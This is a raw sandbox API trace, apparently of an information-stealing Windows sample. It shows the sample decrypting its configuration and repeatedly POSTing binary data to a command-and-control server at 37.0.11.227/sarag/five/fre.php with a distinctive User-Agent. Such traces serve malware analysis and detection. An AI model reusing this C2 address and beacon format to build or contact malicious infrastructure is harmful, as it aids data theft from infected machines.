szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0336.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.289] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0336.295] GetProcessHeap () returned 0x690000 [0336.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0336.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.296] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0336.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.297] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0336.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.297] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0336.297] GetProcessHeap () returned 0x690000 [0336.298] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0336.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.299] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0336.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.299] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0336.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.300] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0336.300] GetProcessHeap () returned 0x690000 [0336.300] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0336.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.301] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0336.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.302] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0336.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.303] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0336.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.304] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0336.304] GetProcessHeap () returned 0x690000 [0336.304] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0336.304] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0336.304] GetProcessHeap () returned 0x690000 [0336.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0336.305] GetProcessHeap () returned 0x690000 [0336.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0336.305] GetProcessHeap () returned 0x690000 [0336.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0336.306] GetProcessHeap () returned 0x690000 [0336.306] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0336.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.306] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0336.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.322] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0336.327] GetProcessHeap () returned 0x690000 [0336.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0336.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.328] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0336.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.329] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0336.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.330] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0336.330] GetProcessHeap () returned 0x690000 [0336.330] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0336.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.331] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0336.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.332] CryptDestroyKey (hKey=0x69d028) returned 1 [0336.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.333] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0336.333] GetProcessHeap () returned 0x690000 [0336.333] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0336.333] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.334] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0336.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.335] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0336.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.335] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0336.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.336] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0336.336] GetProcessHeap () returned 0x690000 [0336.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0336.337] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0336.337] GetProcessHeap () returned 0x690000 [0336.337] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0336.337] socket (af=2, type=1, protocol=6) returned 0xbf8 [0336.337] connect (s=0xbf8, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0336.366] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0336.366] GetProcessHeap () returned 0x690000 [0336.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0336.366] GetProcessHeap () returned 0x690000 [0336.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0336.367] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0336.368] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0336.368] GetProcessHeap () returned 0x690000 [0336.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0336.368] GetProcessHeap () returned 0x690000 [0336.369] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0336.369] GetProcessHeap () returned 0x690000 [0336.369] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0336.369] GetProcessHeap () returned 0x690000 [0336.369] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0336.370] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0336.371] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0336.371] GetProcessHeap () returned 0x690000 [0336.371] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0336.371] GetProcessHeap () returned 0x690000 [0336.371] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0336.372] send (s=0xbf8, buf=0x6ad508*, len=242, flags=0) returned 242 [0336.372] send (s=0xbf8, buf=0x6aba40*, len=159, flags=0) returned 159 [0336.372] GetProcessHeap () returned 0x690000 [0336.372] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0336.372] recv (in: s=0xbf8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0336.435] GetProcessHeap () returned 0x690000 [0336.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0336.436] GetProcessHeap () returned 0x690000 [0336.437] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0336.437] GetProcessHeap () returned 0x690000 [0336.437] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0336.437] GetProcessHeap () returned 0x690000 [0336.437] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0336.437] closesocket (s=0xbf8) returned 0 [0336.438] GetProcessHeap () returned 0x690000 [0336.438] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0336.438] GetProcessHeap () returned 0x690000 [0336.438] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0336.438] GetProcessHeap () returned 0x690000 [0336.439] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0336.439] GetProcessHeap () returned 0x690000 [0336.439] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0336.439] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x194c) returned 0xbf8 [0336.453] Sleep (dwMilliseconds=0xea60) [0336.455] GetProcessHeap () returned 0x690000 [0336.455] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0336.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.456] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0336.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.466] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0336.476] GetProcessHeap () returned 0x690000 [0336.476] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0336.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.478] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0336.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.479] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0336.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.485] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0336.486] GetProcessHeap () returned 0x690000 [0336.486] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0336.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.487] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0336.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.488] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0336.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.489] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0336.489] GetProcessHeap () returned 0x690000 [0336.489] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0336.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.490] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0336.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.491] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0336.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.492] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0336.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.493] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0336.494] GetProcessHeap () returned 0x690000 [0336.494] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0336.494] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0336.494] GetProcessHeap () returned 0x690000 [0336.494] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0336.494] GetProcessHeap () returned 0x690000 [0336.495] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0336.495] GetProcessHeap () returned 0x690000 [0336.495] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0336.495] GetProcessHeap () returned 0x690000 [0336.495] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0336.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.496] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0336.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.502] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0336.509] GetProcessHeap () returned 0x690000 [0336.509] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0336.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.510] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0336.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.511] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0336.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.512] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0336.512] GetProcessHeap () returned 0x690000 [0336.513] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0336.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.515] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0336.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.516] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0336.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.517] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0336.517] GetProcessHeap () returned 0x690000 [0336.517] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0336.518] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.518] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0336.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.520] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0336.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.521] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0336.522] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0336.522] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0336.522] GetProcessHeap () returned 0x690000 [0336.522] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0336.522] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0336.522] GetProcessHeap () returned 0x690000 [0336.522] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0336.522] socket (af=2, type=1, protocol=6) returned 0xbfc [0336.523] connect (s=0xbfc, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0336.563] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0336.563] GetProcessHeap () returned 0x690000 [0336.563] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0336.563] GetProcessHeap () returned 0x690000 [0336.563] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0336.564] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0336.566] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0336.566] GetProcessHeap () returned 0x690000 [0336.566] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0336.566] GetProcessHeap () returned 0x690000 [0336.567] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0336.567] GetProcessHeap () returned 0x690000 [0336.567] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0336.567] GetProcessHeap () returned 0x690000 [0336.568] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0336.568] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0336.569] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0336.569] GetProcessHeap () returned 0x690000 [0336.569] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0336.569] GetProcessHeap () returned 0x690000 [0336.570] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0336.570] send (s=0xbfc, buf=0x6ad508*, len=242, flags=0) returned 242 [0336.570] send (s=0xbfc, buf=0x6aba40*, len=159, flags=0) returned 159 [0336.571] GetProcessHeap () returned 0x690000 [0336.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0336.571] recv (in: s=0xbfc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0336.653] GetProcessHeap () returned 0x690000 [0336.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0336.654] GetProcessHeap () returned 0x690000 [0336.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0336.655] GetProcessHeap () returned 0x690000 [0336.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0336.655] GetProcessHeap () returned 0x690000 [0336.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0336.655] closesocket (s=0xbfc) returned 0 [0336.656] GetProcessHeap () returned 0x690000 [0336.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0336.656] GetProcessHeap () returned 0x690000 [0336.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0336.656] GetProcessHeap () returned 0x690000 [0336.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0336.657] GetProcessHeap () returned 0x690000 [0336.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0336.658] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1950) returned 0xbfc [0336.660] Sleep (dwMilliseconds=0xea60) [0336.661] GetProcessHeap () returned 0x690000 [0336.661] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0336.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.662] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0336.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.670] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0336.683] GetProcessHeap () returned 0x690000 [0336.683] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0336.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.684] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0336.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.685] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0336.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0336.686] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0336.686] GetProcessHeap () returned 0x690000 [0336.686] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0336.687] 